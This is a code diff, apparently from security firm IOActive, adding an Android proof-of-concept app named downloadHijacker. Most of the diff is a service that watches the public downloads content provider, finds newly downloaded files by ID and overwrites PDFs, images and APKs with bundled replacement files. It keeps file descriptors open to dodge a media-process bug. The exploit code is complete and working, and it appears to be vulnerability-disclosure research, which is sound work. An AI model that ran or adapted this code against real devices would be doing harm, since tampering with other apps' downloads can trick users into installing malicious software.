IOActive
diff --git a/‎.gitignore
+17-2 b/‎.gitignore
+17-2
diff --git a/‎.idea/misc.xml
+14 b/‎.idea/misc.xml
+14
diff --git a/‎.idea/runConfigurations.xml
+12 b/‎.idea/runConfigurations.xml
+12
diff --git a/‎app/.gitignore
+1 b/‎app/.gitignore
+1
diff --git a/‎app/build.gradle
+28 b/‎app/build.gradle
+28
diff --git a/‎app/proguard-rules.pro
+21 b/‎app/proguard-rules.pro
+21
diff --git a/‎app/src/main/AndroidManifest.xml
+23 b/‎app/src/main/AndroidManifest.xml
+23
diff --git a/‎app/src/main/assets/troll.gif
36.5 KB b/‎app/src/main/assets/troll.gif
36.5 KB
diff --git a/‎app/src/main/assets/troll.jpg
67.1 KB b/‎app/src/main/assets/troll.jpg
67.1 KB
diff --git a/‎app/src/main/assets/troll.pdf
55.1 KB b/‎app/src/main/assets/troll.pdf
55.1 KB
diff --git a/‎app/src/main/assets/troll.png
37 KB b/‎app/src/main/assets/troll.png
37 KB
diff --git a/‎app/src/main/java/com/ioactive/downloadHijacker/DownloadHijackerService.java
+159 b/‎app/src/main/java/com/ioactive/downloadHijacker/DownloadHijackerService.java
+159
@@ -1,6 +1,7 @@
 # Built application files
 *.apk
 *.ap_
+*.aab
 
 # Files for the ART/Dalvik VM
 *.dex
@@ -41,16 +42,20 @@ captures/
 .idea/dictionaries
 .idea/libraries
 .idea/caches
+# Android Studio 3 in .gitignore file.
+.idea/caches/build_file_checksums.ser
+.idea/modules.xml
 
 # Keystore files
-# Uncomment the following line if you do not want to check your keystore files in.
+# Uncomment the following lines if you do not want to check your keystore files in.
 #*.jks
+#*.keystore
 
 # External native build folder generated in Android Studio 2.2 and later
 .externalNativeBuild
 
 # Google Services (e.g. APIs or Firebase)
-google-services.json
+# google-services.json
 
 # Freeline
 freeline.py
@@ -63,3 +68,13 @@ fastlane/Preview.html
 fastlane/screenshots
 fastlane/test_output
 fastlane/readme.md
+
+# Version control
+vcs.xml
+
+# lint
+lint/intermediates/
+lint/generated/
+lint/outputs/
+lint/tmp/
+# lint/reports/
@@ -0,0 +1 @@
+/build
@@ -0,0 +1,28 @@
+apply plugin: 'com.android.application'
+
+android {
+    compileSdkVersion 27
+    defaultConfig {
+        applicationId "com.ioactive.downloadHijacker"
+        minSdkVersion 21
+        targetSdkVersion 27
+        versionCode 1
+        versionName "1.0"
+        testInstrumentationRunner "android.support.test.runner.AndroidJUnitRunner"
+    }
+    buildTypes {
+        release {
+            minifyEnabled false
+            proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro'
+        }
+    }
+}
+
+dependencies {
+    implementation fileTree(dir: 'libs', include: ['*.jar'])
+    implementation 'com.android.support:appcompat-v7:27.1.1'
+    implementation 'com.android.support.constraint:constraint-layout:1.1.2'
+    testImplementation 'junit:junit:4.12'
+    androidTestImplementation 'com.android.support.test:runner:1.0.2'
+    androidTestImplementation 'com.android.support.test.espresso:espresso-core:3.0.2'
+}
@@ -0,0 +1,21 @@
+# Add project specific ProGuard rules here.
+# You can control the set of applied configuration files using the
+# proguardFiles setting in build.gradle.
+#
+# For more details, see
+#   http://developer.android.com/guide/developing/tools/proguard.html
+
+# If your project uses WebView with JS, uncomment the following
+# and specify the fully qualified class name to the JavaScript interface
+# class:
+#-keepclassmembers class fqcn.of.javascript.interface.for.webview {
+#   public *;
+#}
+
+# Uncomment this to preserve the line number information for
+# debugging stack traces.
+#-keepattributes SourceFile,LineNumberTable
+
+# If you keep the line number information, uncomment this to
+# hide the original source file name.
+#-renamesourcefileattribute SourceFile
@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="utf-8"?>
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="com.ioactive.downloadHijacker">
+
+    <application
+        android:allowBackup="true"
+        android:icon="@mipmap/ic_launcher"
+        android:label="@string/app_name"
+        android:roundIcon="@mipmap/ic_launcher_round"
+        android:supportsRtl="true"
+        android:theme="@style/AppTheme">
+        <activity android:name="com.ioactive.downloadHijacker.MainActivity" android:windowSoftInputMode="stateHidden">
+            <intent-filter>
+                <action android:name="android.intent.action.MAIN" />
+                <category android:name="android.intent.category.LAUNCHER" />
+            </intent-filter>
+        </activity>
+
+        <service
+            android:name="com.ioactive.downloadHijacker.DownloadHijackerService"
+            android:exported="false"/>
+    </application>
+</manifest>
@@ -0,0 +1,159 @@
+package com.ioactive.downloadHijacker;
+
+import android.app.IntentService;
+import android.content.ContentResolver;
+import android.content.Intent;
+import android.content.res.AssetManager;
+import android.database.Cursor;
+import android.net.Uri;
+import android.os.ParcelFileDescriptor;
+import android.util.Log;
+
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.util.ArrayList;
+
+import static com.ioactive.downloadHijacker.MainActivity.PUBLIC_DOWNLOADS_ID_URI;
+import static com.ioactive.downloadHijacker.MainActivity.TAG;
+
+public class DownloadHijackerService extends IntentService {
+
+    // The service will stop automatically after "SERVICE_LIFETIME_MS" milliseconds
+    private static final int SERVICE_LIFETIME_MS = 5 * 60 * 1000;
+
+    // How many IDs to iterate starting from the last ID found
+    private static final int MONITOR_RANGE = 50;
+
+    private static final int FILE_PDF = 0;
+    private static final int FILE_PNG = 1;
+    private static final int FILE_JPG = 2;
+    private static final int FILE_GIF = 3;
+    private static final int FILE_APK = 4;
+
+    // Array containing input streams to overwrite the downloaded files with different formats
+    private static InputStream[] mOverwriteStreams = new InputStream[5];
+
+    // Dummy container for file descriptors, to keep a reference and avoid closing them
+    ArrayList<ParcelFileDescriptor> mFileDescriptors = new ArrayList<ParcelFileDescriptor>();
+
+    public DownloadHijackerService() {
+        super("DownloadHijackerService");
+    }
+
+    private void initializeInternalAssets() {
+        AssetManager assetManager = getAssets();
+        try {
+            mOverwriteStreams[FILE_PDF] = assetManager.open("troll.pdf");
+            mOverwriteStreams[FILE_PNG] = assetManager.open("troll.png");
+            mOverwriteStreams[FILE_JPG] = assetManager.open("troll.jpg");
+            mOverwriteStreams[FILE_GIF] = assetManager.open("troll.gif");
+            mOverwriteStreams[FILE_APK] = assetManager.open("app.apk");
+        } catch (IOException ex) {
+            Log.e(TAG, "DownloadHijackerService: Error reading internal assets", ex);
+        }
+    }
+
+    private static InputStream getOverwriteStreamByFileExtension(String filename) {
+        if (filename != null && !filename.isEmpty()) {
+            filename = filename.toLowerCase();
+            if (filename.endsWith(".pdf"))
+                return mOverwriteStreams[FILE_PDF];
+            else if (filename.endsWith(".png"))
+                return mOverwriteStreams[FILE_PNG];
+            if (filename.endsWith(".jpg") || filename.endsWith(".jpeg"))
+                return mOverwriteStreams[FILE_JPG];
+            if (filename.endsWith(".gif"))
+                return mOverwriteStreams[FILE_GIF];
+            if (filename.endsWith(".apk") || filename.endsWith(".bin"))
+                return mOverwriteStreams[FILE_APK];
+        }
+        return null;
+    }
+
+    @Override
+    protected void onHandleIntent(Intent workIntent) {
+        Log.d(TAG, "Starting download hijacker service...");
+        //android.os.Process.setThreadPriority(-20);
+        initializeInternalAssets();
+
+        int minId = workIntent.getIntExtra("minId", 0);
+        int maxId = workIntent.getIntExtra("maxId", 1000);
+        boolean closeFiles = workIntent.getBooleanExtra("closeFiles", false);
+        int lastId = 0;
+
+        // Try to find the last used identifier to optimize the monitored range
+        // and avoid overwriting preexisting files
+        ContentResolver res = this.getContentResolver();
+        for (int id = minId; id < maxId; id++) {
+            Uri uri = Uri.parse(PUBLIC_DOWNLOADS_ID_URI + id);
+            Cursor cur = res.query(uri, null, null, null, null);
+            try {
+                if (cur != null && cur.getCount() > 0) {
+                    lastId = Math.max(id, lastId);
+                }
+            } finally {
+                if (cur != null)
+                    cur.close();
+            }
+        }
+
+        Log.d(TAG, "Service ready! Last download ID = " + lastId);
+        long tStart = System.currentTimeMillis();
+
+        while (System.currentTimeMillis() < tStart + SERVICE_LIFETIME_MS) {
+            for (int id = lastId + 1; id < lastId + MONITOR_RANGE; id++) {
+                Uri uri = Uri.parse(PUBLIC_DOWNLOADS_ID_URI + id);
+                Cursor cur = res.query(uri, null, null, null, null);
+
+                try {
+                    if (cur != null && cur.getCount() > 0) {
+                        cur.moveToFirst();
+                        String rowData = cur.getString(cur.getColumnIndex("_data"));
+                        String rowUri = cur.getString(cur.getColumnIndex("uri"));
+                        Log.d(TAG, id + "   " + rowData + "   " + rowUri);
+
+                        InputStream is = getOverwriteStreamByFileExtension(rowData);
+                        if (is != null) {
+                            try {
+                                ParcelFileDescriptor f = res.openFileDescriptor(uri, "rwt");
+                                FileOutputStream fos = new FileOutputStream(f.getFileDescriptor());
+                                is.reset();
+
+                                byte[] buffer = new byte[1024];
+                                int length;
+                                while ((length = is.read(buffer)) > 0) {
+                                    fos.write(buffer, 0, length);
+                                }
+
+                                fos.flush();
+
+                                // Keeping a reference to the file descriptor to avoid closing it.
+                                // If the file descriptor is closed, a bug in the media process will
+                                // raise an exception attempting to update the download database with
+                                // the new file size and modification timestamp.
+                                if (closeFiles)
+                                    f.close();
+                                else
+                                    mFileDescriptors.add(f);
+
+                                Log.d(TAG, "File overwritten: " + rowData );
+                                lastId = Math.max(id, lastId);
+                            } catch (Exception e) {
+                                Log.e(TAG, "Error overwriting file: ", e);
+                            }
+                        }
+                    }
+                } catch (Exception e) {
+                    Log.e(TAG, "onHandleIntent: ", e);
+                } finally {
+                    if (cur != null)
+                        cur.close();
+                }
+            }
+        }
+
+        Log.d(TAG, "Download hijacker service stopped.");
+        stopSelf();
+    }
+}